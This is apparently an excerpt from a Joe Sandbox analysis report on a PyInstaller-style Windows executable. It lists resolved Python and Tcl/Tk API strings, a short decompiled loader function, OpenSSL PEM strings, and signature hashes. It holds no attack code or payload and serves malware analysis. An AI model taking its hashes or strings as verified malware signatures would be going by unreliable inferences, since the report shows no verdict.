PyUnicode_FromString, xrefs: 00007FF7DA8D4525
PyEval_EvalCode, xrefs: 00007FF7DA8D44D5
Failed to get address for Py_UnbufferedStdioFlag, xrefs: 00007FF7DA8D3F49
Failed to get address for PyErr_Restore, xrefs: 00007FF7DA8D41D1
Failed to get address for Py_Initialize, xrefs: 00007FF7DA8D4041
Py_UTF8Mode, xrefs: 00007FF7DA8D3F5D
PyImport_ExecCodeModule, xrefs: 00007FF7DA8D422D
PyMem_RawFree, xrefs: 00007FF7DA8D4575
PyLong_AsLong, xrefs: 00007FF7DA8D42CD
Failed to get address for Py_Finalize, xrefs: 00007FF7DA8D3FF1
Py_DontWriteBytecodeFlag, xrefs: 00007FF7DA8D3DDF
Py_IgnoreEnvironmentFlag, xrefs: 00007FF7DA8D3E65
Failed to get address for Py_DecRef, xrefs: 00007FF7DA8D3FC9
Py_IncRef, xrefs: 00007FF7DA8D3FFD
Py_DecodeLocale, xrefs: 00007FF7DA8D454D
Failed to get address for PyUnicode_Join, xrefs: 00007FF7DA8D4659
Failed to get address for PyImport_ImportModule, xrefs: 00007FF7DA8D4271
PyImport_ImportModule, xrefs: 00007FF7DA8D4255
PyObject_Str, xrefs: 00007FF7DA8D43BD
Py_SetPythonHome, xrefs: 00007FF7DA8D40C5
Failed to get address for PyLong_AsLong, xrefs: 00007FF7DA8D42E9
Failed to get address for PyList_Append, xrefs: 00007FF7DA8D4299
PyObject_CallFunctionObjArgs, xrefs: 00007FF7DA8D4345
Failed to get address for PySys_SetArgvEx, xrefs: 00007FF7DA8D4451
Failed to get address for PySys_AddWarnOption, xrefs: 00007FF7DA8D4429
PySys_SetObject, xrefs: 00007FF7DA8D4485
PyUnicode_DecodeFSDefault, xrefs: 00007FF7DA8D45ED
PyList_New, xrefs: 00007FF7DA8D42A5
Failed to get address for PyObject_SetAttrString, xrefs: 00007FF7DA8D4389
PySys_GetObject, xrefs: 00007FF7DA8D445D
PyObject_CallFunction, xrefs: 00007FF7DA8D431D
Failed to get address for Py_DontWriteBytecodeFlag, xrefs: 00007FF7DA8D3DF8
Py_SetProgramName, xrefs: 00007FF7DA8D409D
PyUnicode_AsUTF8, xrefs: 00007FF7DA8D4615
Py_Finalize, xrefs: 00007FF7DA8D3FD5
Py_OptimizeFlag, xrefs: 00007FF7DA8D3EDD
Failed to get address for PyImport_ExecCodeModule, xrefs: 00007FF7DA8D4249
PyUnicode_Join, xrefs: 00007FF7DA8D463D
Failed to get address for Py_OptimizeFlag, xrefs: 00007FF7DA8D3EF9
GetProcAddress, xrefs: 00007FF7DA8D3DFF
Failed to get address for Py_GetPath, xrefs: 00007FF7DA8D4091
PyUnicode_Decode, xrefs: 00007FF7DA8D45C5
Failed to get address for PyModule_GetDict, xrefs: 00007FF7DA8D4311
PyList_Append, xrefs: 00007FF7DA8D427D
PyDict_GetItemString, xrefs: 00007FF7DA8D40ED
Py_UnbufferedStdioFlag, xrefs: 00007FF7DA8D3F2D
Py_BuildValue, xrefs: 00007FF7DA8D3F85
PyErr_Restore, xrefs: 00007FF7DA8D41B5
Failed to get address for Py_NoUserSiteDirectory, xrefs: 00007FF7DA8D3ED1

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
API String ID: 190572456-3109299426
Opcode ID: 6e6539b2492bcb566142f8ce84d8e1d9cc234e654b2aa916a41ae674904a9854
Instruction ID: 69c80da23c30c5a95c2656c4344378e68197b8a753d53636adcba2003ffa9457
Opcode Fuzzy Hash: 6e6539b2492bcb566142f8ce84d8e1d9cc234e654b2aa916a41ae674904a9854
Instruction Fuzzy Hash: 0442D565A09B0399FE06BB04B8441BCE3A5BF64794BD854B7CC0E462A6FF7CE564C324

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D55B0 Relevance: 166.5, APIs: 31, Strings: 64, Instructions: 287
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E00007FF77FF7DA8D55B0(long long __rax, void* __rcx) {
				void* __rbx;
				long long _t11;
				void* _t12;
				void* _t22;
				void* _t23;

				_t11 = __rax;
				_t12 = __rcx;
				E00007FF77FF7DA8D7120(__rax, __rcx, __rcx + 0x10);
				 *((long long*)(_t12 + 0x4048)) = _t11;
				E00007FF77FF7DA8D7120(_t11, _t12, _t12 + 0x1010);
				 *((long long*)(_t12 + 0x4050)) = _t11;
				if ( *((intOrPtr*)(_t12 + 0x4048)) == 0) goto 0xda8d55fa;
				if (_t11 == 0) goto 0xda8d55fa;
				goto 0xda8d5f30;
				E00007FF77FF7DA8D2770(_t11, "LOADER: Failed to load tcl/tk libraries\n", _t11, _t22, _t23);
				return 0xffffffff;
			}

0x7ff7da8d55b0
0x7ff7da8d55b6
0x7ff7da8d55bd
0x7ff7da8d55c9
0x7ff7da8d55d0
0x7ff7da8d55dc
0x7ff7da8d55e6
0x7ff7da8d55eb
0x7ff7da8d55f5
0x7ff7da8d5601
0x7ff7da8d5610

APIs

Part of subcall function 00007FF7DA8D7120: LoadLibraryW.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D7143

GetProcAddress.KERNEL32 ref: 00007FF7DA8D5F47
GetProcAddress.KERNEL32 ref: 00007FF7DA8D5F86
GetProcAddress.KERNEL32 ref: 00007FF7DA8D5FAB
GetProcAddress.KERNEL32 ref: 00007FF7DA8D5FD0
GetProcAddress.KERNEL32 ref: 00007FF7DA8D5FF8
GetProcAddress.KERNEL32 ref: 00007FF7DA8D6020
GetProcAddress.KERNEL32 ref: 00007FF7DA8D6048
GetProcAddress.KERNEL32 ref: 00007FF7DA8D6070
GetProcAddress.KERNEL32 ref: 00007FF7DA8D6098

Strings

Tcl_FindExecutable, xrefs: 00007FF7DA8D5FA1
Failed to get address for Tcl_EvalObjv, xrefs: 00007FF7DA8D637A
Tcl_ConditionFinalize, xrefs: 00007FF7DA8D6106
Tcl_CreateObjCommand, xrefs: 00007FF7DA8D621E
Tcl_CreateThread, xrefs: 00007FF7DA8D6066
Tcl_MutexLock, xrefs: 00007FF7DA8D60B6
Tcl_DeleteInterp, xrefs: 00007FF7DA8D603E
Failed to get address for Tcl_ConditionNotify, xrefs: 00007FF7DA8D614A
Failed to get address for Tcl_ConditionFinalize, xrefs: 00007FF7DA8D6122
Tcl_GetCurrentThread, xrefs: 00007FF7DA8D608E
Tcl_ConditionWait, xrefs: 00007FF7DA8D6156
Failed to get address for Tcl_SetVar2, xrefs: 00007FF7DA8D6212
Failed to get address for Tcl_MutexUnlock, xrefs: 00007FF7DA8D60FA
Failed to get address for Tk_GetNumMainWindows, xrefs: 00007FF7DA8D641A
Tcl_NewStringObj, xrefs: 00007FF7DA8D626E
Failed to get address for Tcl_ConditionWait, xrefs: 00007FF7DA8D6172
Tcl_ThreadQueueEvent, xrefs: 00007FF7DA8D617E
Failed to get address for Tcl_GetCurrentThread, xrefs: 00007FF7DA8D60AA
Failed to get address for Tcl_ThreadAlert, xrefs: 00007FF7DA8D61C2
Tcl_GetVar2, xrefs: 00007FF7DA8D61CE
Failed to get address for Tcl_GetString, xrefs: 00007FF7DA8D6262
Tcl_Init, xrefs: 00007FF7DA8D5F40
Failed to get address for Tcl_NewStringObj, xrefs: 00007FF7DA8D628A
Failed to get address for Tcl_Init, xrefs: 00007FF7DA8D5F59
Failed to get address for Tcl_DoOneEvent, xrefs: 00007FF7DA8D5FE2
Failed to get address for Tcl_EvalFile, xrefs: 00007FF7DA8D632A
Failed to get address for Tcl_Alloc, xrefs: 00007FF7DA8D63A2
Tcl_ConditionNotify, xrefs: 00007FF7DA8D612E
LOADER: Failed to load tcl/tk libraries, xrefs: 00007FF7DA8D55FA
Failed to get address for Tcl_EvalEx, xrefs: 00007FF7DA8D6352
Tcl_SetVar2, xrefs: 00007FF7DA8D61F6
Tk_Init, xrefs: 00007FF7DA8D63D6
Tk_GetNumMainWindows, xrefs: 00007FF7DA8D63FE
Failed to get address for Tcl_MutexLock, xrefs: 00007FF7DA8D60D2
Tcl_EvalObjv, xrefs: 00007FF7DA8D635E
Failed to get address for Tcl_Finalize, xrefs: 00007FF7DA8D600A
Tcl_EvalFile, xrefs: 00007FF7DA8D630E
Tcl_SetVar2Ex, xrefs: 00007FF7DA8D62BE
Failed to get address for Tcl_Free, xrefs: 00007FF7DA8D63CA
Failed to get address for Tcl_CreateThread, xrefs: 00007FF7DA8D6082
Failed to get address for Tcl_FinalizeThread, xrefs: 00007FF7DA8D6032
Failed to get address for Tk_Init, xrefs: 00007FF7DA8D63F2
Tcl_MutexUnlock, xrefs: 00007FF7DA8D60DE
Tcl_Free, xrefs: 00007FF7DA8D63AE
Tcl_GetString, xrefs: 00007FF7DA8D6246
Tcl_DoOneEvent, xrefs: 00007FF7DA8D5FC6
Failed to get address for Tcl_NewByteArrayObj, xrefs: 00007FF7DA8D62B2
Failed to get address for Tcl_CreateInterp, xrefs: 00007FF7DA8D5F98
Tcl_Finalize, xrefs: 00007FF7DA8D5FEE
Failed to get address for Tcl_GetObjResult, xrefs: 00007FF7DA8D6302
Failed to get address for Tcl_CreateObjCommand, xrefs: 00007FF7DA8D623A
Tcl_NewByteArrayObj, xrefs: 00007FF7DA8D6296
GetProcAddress, xrefs: 00007FF7DA8D5F60
Tcl_CreateInterp, xrefs: 00007FF7DA8D5F7C
Tcl_FinalizeThread, xrefs: 00007FF7DA8D6016
Tcl_ThreadAlert, xrefs: 00007FF7DA8D61A6
Tcl_GetObjResult, xrefs: 00007FF7DA8D62E6
Failed to get address for Tcl_GetVar2, xrefs: 00007FF7DA8D61EA
Failed to get address for Tcl_SetVar2Ex, xrefs: 00007FF7DA8D62DA
Tcl_Alloc, xrefs: 00007FF7DA8D6386
Failed to get address for Tcl_FindExecutable, xrefs: 00007FF7DA8D5FBD
Tcl_EvalEx, xrefs: 00007FF7DA8D6336
Failed to get address for Tcl_ThreadQueueEvent, xrefs: 00007FF7DA8D619A
Failed to get address for Tcl_DeleteInterp, xrefs: 00007FF7DA8D605A

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$LOADER: Failed to load tcl/tk libraries$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 2238633743-1453502826
Opcode ID: a292763a8d5a77b935cdc9b9955935c5d127cb344716fe205c8c3bab3fa22d19
Instruction ID: f2b463c7de1490def46a89682daebeacc028d11f25010ee1b5407c8b22949631
Opcode Fuzzy Hash: a292763a8d5a77b935cdc9b9955935c5d127cb344716fe205c8c3bab3fa22d19
Instruction Fuzzy Hash: B9E1D9A4A19B0388FE1BAB14A85017CE3A5BF65754FD864B7CC0E46396EF7CA524C330

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFDA13F10 Relevance: 49.7, APIs: 19, Strings: 14, Instructions: 223stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA13F61
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA13F78
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA13F8F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA13FC2
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA1400B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA1403F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA14091
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA140A4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA140BB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA140CE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA140E5
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA140F8
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA1410F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA14122
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA14135
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA14148
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA1415B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA141A7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFCFDA14B53,?,?,?,?,?,?,?,?,00007FFCFDA12B8B), ref: 00007FFCFDA141D2

Strings

TRUSTED CERTIFICATE, xrefs: 00007FFCFDA14118, 00007FFCFDA1413E
ANY PRIVATE KEY, xrefs: 00007FFCFDA13F57
CERTIFICATE, xrefs: 00007FFCFDA140C4, 00007FFCFDA14105, 00007FFCFDA14151, 00007FFCFDA141C8
CERTIFICATE REQUEST, xrefs: 00007FFCFDA140EE
DH PARAMETERS, xrefs: 00007FFCFDA1409A
NEW CERTIFICATE REQUEST, xrefs: 00007FFCFDA140DB
ENCRYPTED PRIVATE KEY, xrefs: 00007FFCFDA13F6E
CMS, xrefs: 00007FFCFDA141D7
PKCS #7 SIGNED DATA, xrefs: 00007FFCFDA1419D
PKCS7, xrefs: 00007FFCFDA14162
X509 CERTIFICATE, xrefs: 00007FFCFDA140B1, 00007FFCFDA1412B
X9.42 DH PARAMETERS, xrefs: 00007FFCFDA14087
PARAMETERS, xrefs: 00007FFCFDA14001, 00007FFCFDA14031
PRIVATE KEY, xrefs: 00007FFCFDA13F85, 00007FFCFDA13FB4

Memory Dump Source

Source File: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID: strcmp
String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS
API String ID: 1004003707-1119032718
Opcode ID: 53791607f956101f911f03bce5df1fcc48f1ca8588c3d50ca4fb3c9ab6ede07a
Instruction ID: 0d5eb8eab7274291b78bf6278cfaf5f890bafc808a4c22d3ff4d71fc92667c30
Opcode Fuzzy Hash: 53791607f956101f911f03bce5df1fcc48f1ca8588c3d50ca4fb3c9ab6ede07a
Instruction Fuzzy Hash: D691D211A0CB7F90FF545B299630278E6919F65BD0F8A2230DD3E462C6FE6CE441CAB4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD861B77 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 204stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFDA1319A
strspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFDA131DA
strspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFDA131FE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFDA13217
strspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFDA13233
strspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFDA1324C

Strings

Proc-Type:, xrefs: 00007FFCFDA13193
..\s\crypto\pem\pem_lib.c, xrefs: 00007FFCFDA131B4, 00007FFCFDA13267, 00007FFCFDA132A9, 00007FFCFDA1331E, 00007FFCFDA13366, 00007FFCFDA13394, 00007FFCFDA13449
ENCRYPTED, xrefs: 00007FFCFDA1320A
DEK-Info:, xrefs: 00007FFCFDA13287
, xrefs: 00007FFCFDA13229
,, xrefs: 00007FFCFDA132DA
, xrefs: 00007FFCFDA13242

Memory Dump Source

Source File: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID: strspn$strncmp
String ID: $ $ ,$..\s\crypto\pem\pem_lib.c$DEK-Info:$ENCRYPTED$Proc-Type:
API String ID: 1384302209-3505811795
Opcode ID: 398b3682302abd1cc3d8a4816504ce7b5e9254469f9c734eb94c0a305c6e8597
Instruction ID: 1bca3b9e9b56f823aa1a0909c3d574adaef9e7f64a8b4867eda4f17e62211bfc
Opcode Fuzzy Hash: 398b3682302abd1cc3d8a4816504ce7b5e9254469f9c734eb94c0a305c6e8597
Instruction Fuzzy Hash: B991A061A0C97B86F715AF11E4601B9BB60AF05B84F814031DA6D43AD2FF2CE54ACBF4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD741150 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 188COMMON

Download Yara Rule

APIs

_PyUnicode_EqualToASCIIId.PYTHON310 ref: 00007FFCFD7411DF
_PyUnicode_EqualToASCIIId.PYTHON310 ref: 00007FFCFD7411F7
PyType_IsSubtype.PYTHON310 ref: 00007FFCFD74121A

Part of subcall function 00007FFCFD7412F0: PyMem_Malloc.PYTHON310 ref: 00007FFCFD741372

_PyArg_CheckPositional.PYTHON310 ref: 00007FFCFD743697
_PyUnicode_Ready.PYTHON310 ref: 00007FFCFD7436AD
_PyUnicode_Ready.PYTHON310 ref: 00007FFCFD7436C4
_PyUnicode_EqualToASCIIId.PYTHON310 ref: 00007FFCFD74372D
